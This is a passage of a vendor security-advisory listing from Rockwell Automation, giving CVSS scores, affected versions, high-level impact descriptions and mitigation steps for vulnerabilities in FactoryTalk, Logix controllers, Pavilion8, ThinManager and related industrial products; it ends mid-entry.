Last Updated: 8/15/2025
Revision Number: 2
CVSS Score: v3.1: 8.8/10, v4.0: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Software Version	Corrected in Software Version
FactoryTalk® View SE	13.0	15.00

Mitigations and Workarounds
Customers using the affected software are encouraged to apply security best practices, if possible.

By default, all HMI server projects are saved in the HMI projects folder on the HMI server computer located at C:\Users\Public\Documents\RSView Enterprise\SE\HMI projects. To enhance security and prevent unauthorized modifications to these projects, you can tighten the Windows folder's security settings on the HMI server computer by following these steps:
- Remove the INTERACTIVE group from the folder’s security properties.
- Add specific users or user groups and assign their permissions to this folder as needed.
- If you assign read-only permission to those users or user groups, they can only view and will not be able to write to project files. Users with read-only permission can still test run and run the FactoryTalk® View SE client.
In Version 14: Open FactoryTalk® View Studio -> Help -> FactoryTalk® View SE Help -> In the Help file -> Security -> “HMI projects folder”

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7513 IMPACT

A code execution vulnerability exists in the affected product. The vulnerability occurs due to improper default file permissions allowing any user to edit or replace files, which are executed by account with elevated permissions.

CVSS 3.1 Base Score: 8.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-732: Incorrect Permission Assignment for Critical Resource
Known Exploited Vulnerability (KEV) database: No

ADDITIONAL RESOURCES

JSON CVE-2024-7513

High

SD1690 | GuardLogix/ControlLogix 5580 Controller denial-of-service Vulnerability via Malformed Packet Handling

Published Date:

August 13, 2024

Last Updated:

September 13, 2024

CVE IDs:

CVE-2024-40619

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: August 13, 2024
Last updated: September 13, 2024

Revision Number: 2..0

September 13th, 2024 – Updated “Corrected in Firmware Versions”

CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Firmware Version	Corrected in Firmware Version
ControlLogix® 5580	v34.011	v34.014, v35.011 and later
GuardLogix 5580	v34.011	v34.014, v35.011 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.

CVE-2024-40619 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability occurs when a malformed CIP packet is sent over the network to the device and results in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-754: Improper Check for Unusual or Exceptional Conditions

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

High

SD1691 | Pavilion8® Unencrypted Data Vulnerability via HTTP protocol

Published Date:

August 13, 2024

Last Updated:

November 13, 2024

CVE IDs:

CVE-2024-40620

CVSS Scores (v3.1):

7.4

CVSS Scores (v4.0):

5.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: August 13, 2024
Last updated: August 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.4/10, v4.0: 5.3/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in software version	Corrected in software revision
Pavilion8®	v5.20	v6.0

Mitigations and Workarounds

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

Interactions between the Console and Dashboard take place on the same machine, the machine should exist behind a firewall and physical access should be limited to authorized personnel.

Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.

CVE-2024-40620 IMPACT

A vulnerability exists in the affected product due to lack of encryption of sensitive information. The vulnerability results in data being sent between the Console and the Dashboard without encryption, which can be seen in the logs of proxy servers, potentially impacting the data's confidentiality.

CVSS 3.1 Base Score: 7.4/10  

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CSVV 4.0 Base Score: 5.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

CWE-311: Missing Encryption of Sensitive Data

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE-2024-40620

Medium

SD1684 | Micro850/870 Vulnerable to denial-of-service Vulnerability via CIP/Modbus Port

Published Date:

August 12, 2024

Last Updated:

October 16, 2024

CVE IDs:

CVE 2024 7567

CVSS Scores (v3.1):

5.3

CVSS Scores (v4.0):

6.9

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Micro850/870 Vulnerable to denial-of-service Vulnerability via CIP/Modbus Port

Published Date: 8/13/24

Last Updated: 8/13/2024

Revision Number: 1.0

CVSS Score: v3.1: 5.3/10, v4.0: 6.9/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Software Version	Corrected in Software Version
PLC - Micro850/870 (2080 -L50E/2080 -L70E)	v20.011	v22.011

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7567 IMPACT

A denial-of-service vulnerability exists via the CIP/Modbus port in the affected products. If exploited, the CIP/Modbus communication may be disrupted for short duration.

CVSS Base Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS Base Score: 6.9
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
CWE: CWE-400: Uncontrolled Resource Consumption

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply security best practices, if possible.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

· CVE-2024-7567

Medium

SD1683 | DLL Hijacking Vulnerability Exists in Emulate3D™

Published Date:

August 12, 2024

Last Updated:

November 19, 2024

CVE IDs:

CVE-2024-6079

CVSS Scores (v3.1):

6.7

CVSS Scores (v4.0):

5.4

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Published Date 8/13/2024

Updated Date: 8/13/2024

Revision Number: 1.0

CVSS: v3.1: 6.7 , 4.0: 5.4

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Software Version	Corrected in Software Version
Emulate3D™	17.00.00.13276	17.00.00.13348

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6079 IMPACT

A vulnerability exists in the affected product, which could be leveraged to execute a DLL Hijacking attack. The application loads shared libraries, which are readable and writable by any user. If exploited, a malicious user could leverage a malicious dll and perform a remote code execution attack.

CVSS Base Score: 6.7
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS Base Score: 5.4
CVSS Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-610: Externally Controlled Reference to a Resource in Another Sphere
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the following risk mitigations , if possible:

· Update to the corrected software version, 17.00.00.13348.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

· JSON CVE-2024-6079

High

SD1682 | Chassis Restrictions Bypass Vulnerability in Select Logix Devices

Published Date:

July 31, 2024

Last Updated:

October 16, 2024

CVE IDs:

CVE-2024-6242

CVSS Scores (v3.1):

8.4

CVSS Scores (v4.0):

7.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Published Date: August 1, 2024

Last updated: August 29th, 2024

Revision Number: 2.0

August 29, 2024 - Updated Affected Products and Solution Chart for 1756-EN2T, 1756-EN2F, 1756-EN2TR, 1756-EN3TR

CVSS Score: 3.1: 8.4/10, 4.0:/8.5

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Firmware Revision	Corrected in Firmware Revision
ControlLogix® 5580 (1756-L8z)	V28	V32.016, V33.015, V34.014, V35.011 and later
GuardLogix® 5580 (1756-L8zS)	V31	V32.016, V33.015, V34.014, V35.011 and later
1756-EN4TR	V2	V5.001 and later
1756-EN2T , Series A/B/C 1756-EN2F, Series A/B 1756-EN2TR, Series A/B 1756-EN3TR, Series A	v5.007(unsigned)/v5.027(signed)	No fix for Series A/B/C. Upgrade to Series D. No fix for Series A/B. Upgrade to Series C. No fix for Series A/B. Upgrade to Series C. No fix for Series A. Upgrade to Series B.
1756-EN2T, Series D 1756-EN2F, Series C 1756-EN2TR, Series C 1756-EN3TR, Series B 1756-EN2TP, Series A	1756-EN2T/D: V10.006 1756-EN2F/C: V10.009 1756-EN2TR/C: V10.007 1756-EN3TR/B: V10.007 1756-EN2TP/A: V10.020	V12.001 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. Claroty reported the following vulnerability.

CVE-2024-6242 IMPACT

A vulnerability exists in the affected products that allows a threat actor to bypass the Trusted® Slot feature in a ControlLogix® controller. If exploited on any affected module in a 1756 chassis, a threat actor could potentially execute CIP commands that modify user projects and/or device configuration on a Logix controller in the chassis.

CVSS Base Score v3.1: 8.4/10 

CVSS Vector: CVSS:3.1 /AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:H

CVSS Base Score v4.0: 7.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H

CWE-420: Unprotected Alternate Channel

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected firmware and who are not able to upgrade to one of the corrected versions are encouraged to apply the following mitigation and security best practices, where possible.

· Limit the allowed CIP commands on controllers by setting the mode switch to the RUN position.

· Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

· JSON CVE 2024-6242

· System Security Design Guidelines

High

SD1681 | Privilege Escalation Vulnerability in Pavilion8®

Published Date:

July 16, 2024

Last Updated:

November 20, 2024

CVE IDs:

CVE-2024-6435

CVSS Scores (v3.1):

8.8

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: July 16, 2024
Last updated: July 16, 2024

Revision Number: 1.0

CVSS Score: v3.1: 8.8/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version(s)

Corrected in Software Revision

Pavilion8®

v5.15.00
v5.15.01
v5.16.00
v5.17.00
v5.17.01

v5.20.00

v6.0

Mitigations and Workarounds

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.  

Limit access to only users who need it.

Periodically review user access and privileges to confirm accuracy.

Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.

CVE-2024-6435 IMPACT

A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions which should only be available to users with administrative level privileges. If exploited, an attacker could read sensitive data, and create users. For example, a malicious user with basic privileges could perform critical functions such as creating a user with elevated privileges and reading sensitive information in the “views” section.

CVSS 3.1 Base Score: 8.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-732: Incorrect Permission Assignment for Critical Resource

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

ADDITIONAL RESOURCES

JSON CVE-2024-6435

High

SD1680 | Major nonrecoverable fault in 5015 – AENFTXT

Published Date:

July 10, 2024

Last Updated:

November 20, 2024

Products:

CVE-2024-6089

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Major nonrecoverable fault in 5015 – AENFTXT

Published Date: 7/16/2024

Updated Date: 7/16/2024

Revision Number: 1.0

CVSS: v3.1: 7.5, 4.0: 8.7

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in firmware revision

Corrected in firmware revision

5015 - AENFTXT

v2.011

v2.012

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6089 IMPACT

An input validation vulnerability exists in the affected products when a manipulated PTP packet is sent, causing the secondary adapter to result in a major nonrecoverable fault. If exploited, a power cycle is required to recover the product.

CVSS Base Score: 8.7/10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CVSS Base Score: 7.5/10
CVSS Vector: CVSS:3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

Update to the corrected firmware revision, v2.012.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

JSON CVE-2024-6089

High

SD1679 | Input Validation Vulnerability exists in the SequenceManager™ Server

Published Date:

July 10, 2024

Last Updated:

September 27, 2024

CVE IDs:

CVE-2024-6436

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: July 16, 2024

Last updated: October 1, 2024

Revision Number: 2.0

October 1, 2024 - Updated CVE Number.

CVSS Score: v3.1 7.5/10, v4.0 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Software Versions	Corrected in software version
SequenceManager™	<v2.0	v2.0 or later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6436 IMPACT

An input validation vulnerability exists in the affected products which could allow a malicious user to send malformed packets to the server and cause a denial-of-service condition. If exploited, the device would become unresponsive, and a manual restart will be required for recovery. Additionally, if exploited, there could be a loss of view for the downstream equipment sequences in the controller. Users would not be able to view the status or command the equipment sequences, however the equipment sequence would continue to execute uninterrupted.

CVSS 3.1 Base Score: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-428: Unquoted Search Path or Element

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

· Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

· JSON CVE-2024-6436

Medium

SD1678 | Unsecured Private Keys in FactoryTalk® System Services

Published Date:

July 02, 2024

Last Updated:

December 01, 2024

CVE IDs:

CVE-2024-6325 , CVE-2024-6236

CVSS Scores (v3.1):

6.5, 5.9

CVSS Scores (v4.0):

6.0, 1.8

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: July 11, 2024

Last updated: July 11, 2024

Revision Number: 1.0

CVSS Score: v3.1: 6.5/10, 5.9/10 ; v4.0: 6.0/10, 1.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Version	Corrected Version
FactoryTalk® System Services (installed via FTPM)	v6.40	V6.40.01
FactoryTalk® Policy Manager (FTPM)	v6.40	V6.40.01

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6325 IMPACT

The v6.40 release of FactoryTalk® Policy Manager allowed the private keys to be insecurely stored with read and execute privileges for the Windows group, ‘Everyone’. These keys are used to generate digital certificates and pre-shared keys. This vulnerability could allow a malicious user with access to the machine to obtain private keys. If obtained, a malicious user could impersonate resources on the secured network. For customers using FactoryTalk® Policy Manager v6.40 who mitigated CVE-2021-22681 and CVE-2022-1161 by implementing CIP security and did not update to the versions of the software that contain the remediation, this vulnerability could allow a threat actor to exploit CVE-2022-1161 and CVE-2022-1161.

CVSS Base Score v3.1: 6.5/10

CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVSS Base Score v4.0: 6.0/10

CVSS Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

CWE: CWE-269 Improper Privilege Management

CVE-2024-6236 IMPACT

An exposure of sensitive information vulnerability exists in the FactoryTalk® System Service. A malicious user could exploit this vulnerability by starting a back-up or restore process, which temporarily exposes private keys, passwords, pre-shared keys, and database folders when they are temporarily copied to an interim folder. This vulnerability is due to the lack of explicit permissions set on the backup folder. If private keys are obtained by a malicious user, they could impersonate resources on the secured network.

CVSS Base Score v3.1: 5.9/10

CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N

CVSS Base Score v4.0: 1.8/10

CVSS Vector String: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

CWE-269 Improper Privilege Management

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software are encouraged to implement the following steps to invalidate the existing vulnerable private keys/digital certificates and regenerate new secure ones.

· Clear CIP Security configurations from devices and from FactoryTalk® Policy Manager

· Update FactoryTalk® System Services and FactoryTalk® Policy Manager to v6.40.01

· Redeploy CIP Security Policy

Detailed steps are below (FactoryTalk System Services (FTSS) is updated through the installation of FactoryTalk Policy Manager (FTPM)

1) Remove deployed security policy from all devices using FactoryTalk® Policy Manager (FTPM):

a. Open FTPM.

b. Document all Zone’s security settings and all Conduit’s settings as you must re-create them after updating FTPM.

c. Change all devices port’s Policies > Zone values to the “Unassigned” Zone.

d. Delete all zones and conduits.

e. Deploy (CIP). Ensure that all endpoints were reset successfully.

f. [migrating from v6.40 only] Deploy (OPC UA). Ensure all endpoints were reset successfully.

i. For any OPC UA clients, perform whatever steps are required by those clients to remove the previously applied certificates.

g. Close FTPM

2) Delete the \FTSS_backup folder:

a. c:\ProgramData\Rockwell\RNAServer\Global\RnaStore\FTSS_Backup

3) Delete the \keystore folder:

a. c:\ProgramData\Rockwell Automation\FactoryTalk System Services\keystore

4) Delete any backup copies of the \keystore folder. They will be named the same as the \keystore folder but with a suffix appended to it, like:

a. c:\ProgramData\Rockwell Automation\FactoryTalk System Services\ keystore_source_2024_04_25_12_25_38_541566

5) Delete the PSKs.json file:

a. c:\ProgramData\Rockwell Automation\FactoryTalk System Services\PSKs.json

6) Delete any backup copies of the PSKs.json file. They will be named the same as the PSKs.json file but with a suffix appended to it, like:

a. c:\ProgramData\Rockwell Automation\FactoryTalk System Services\ PSKs.json_source_2024_05_17_07_38_25_200356

7) Install FactoryTalk® Policy Manager version 6.40.01.

a. Restart the computer when prompted at the end of the install.

8) Open FTPM. FTPM will attempt to connect to the FactoryTalk® System Services web server before proceeding.

9) If FTPM could not successfully connect to FactoryTalk® System Services (FTSS), it is because the FTSS service hasn’t started yet. It will eventually start or else you can start the FTSS service manually in Windows Services.

10) Re-create the original Zones.

11) Move the devices from the unassigned Zone back to their original zones.

12) Re-create the original Conduits.

13) Deploy (CIP endpoints).

14) [migrating from v6.40 only] Deploy (OPC UA endpoints).

a. For any OPC UA client endpoints, manually apply the newly generated certificates from this deploy.

Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

· Security Best Practices

ADDITIONAL RESOURCES

· JSON CVE 2024 6325

· JSON CVE 2024 6326

Critical

SD1677 | ThinManager® ThinServer™ Improper Input Validation Vulnerabilities

Published Date:

June 20, 2024

Last Updated:

October 16, 2024

CVE IDs:

CVE-2024-5988 , CVE-2024-5989, CVE-2024-5990

CVSS Scores (v3.1):

9.8, 7.5

CVSS Scores (v4.0):

9.3, 8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

ThinManager® ThinServer™ Improper Input Validation Vulnerabilities

Published Date: June 25, 2024

Last updated: June 25, 2024

Revision Number: 1.0

CVSS Score: 3.1: 9.8/10, 7.5/10, 4.0: 9.3/10, 8.7 /10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

First Known in software version

Corrected in software version (Available Here)

ThinManager® ThinServer™

2024-5988

2024-5989

11.1.0

11.2.0

12.0.0

12.1.0

13.0.0

13.1.0

13.2.0

11.1.8

11.2.9

12.0.7

12.1.8

13.0.5

13.1.3

13.2.2

2024-5990

11.1.0

11.2.0

12.0.0

12.1.0

13.0.0

13.1.0

11.1.8

11.2.9

12.0.7

12.1.8

13.0.4

13.1.2

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations from the list below, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of vulnerability.

· Update to the corrected software versions via the ThinManager® Downloads Site

· Limit remote access for TCP Port 2031 to known thin clients and ThinManager® servers.

· Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. This vulnerability was discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2024-5988 IMPACT

Due to an improper input validation, an unauthenticated threat actor can send a malicious message to invoke a local or remote executable and cause a remote code execution condition on the affected device.

CVSS Base Score: 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: 20 Improper Input Validation

CVE-2024-5989 IMPACT

Due to an improper input validation, an unauthenticated threat actor can send a malicious message to invoke SQL injection into the program and cause a remote code execution condition on the affected device.

CVSS Base Score: 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: 20 Improper Input Validation

CVE-2024-5990 IMPACT

Due to an improper input validation, an unauthenticated threat actor can send a malicious message to a monitor thread within ThinServer™ and cause a denial-of-service condition on the affected device.

CVSS Base Score: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: 20 Improper Input Validation

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

· CVE-2024-5988 JSON

· CVE-2024-5989 JSON

· CVE-2024-5990 JSON

Critical

SD1676 | FactoryTalk® View SE v11 Information Leakage Vulnerability via Authentication Restriction

Published Date:

June 12, 2024

Last Updated:

December 01, 2024

CVE IDs:

CVE-2024-37368

CVSS Scores (v3.1):

9.8

CVSS Scores (v4.0):

9.2

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

FactoryTalk® View SE

v11.0

v14.0

Mitigations and Workarounds

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

It is recommended that users enforce proper access controls within the network and segment networks containing sensitive information using IPSec: https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1090456

Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.

CVE-2024-37368 IMPACT

A user authentication vulnerability exists in the affected product. The vulnerability allows a user from a remote system with FTView to send a packet to the customer’s server to view an HMI project. Due to the lack of proper authentication, this action is allowed without proper authentication verification.

CVSS 3.1 Base Score: 9.8/10  

CSVV 4.0 Base Score: 9.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE-2024-37368

High

SD1675 | FactoryTalk® View SE v12 Information Leakage Vulnerability via Authentication Restriction

Published Date:

June 12, 2024

Last Updated:

December 01, 2024

CVE IDs:

CVE-2024-37367

CVSS Scores (v3.1):

9.8

CVSS Scores (v4.0):

9.2

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

FactoryTalk® View SE

v12.0

V14.0 and later

Mitigations and Workarounds

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

It is recommended that users enforce proper access controls within the network and segment networks containing sensitive information using IPSec: https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1090456

Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.

CVE-2024-37367 IMPACT

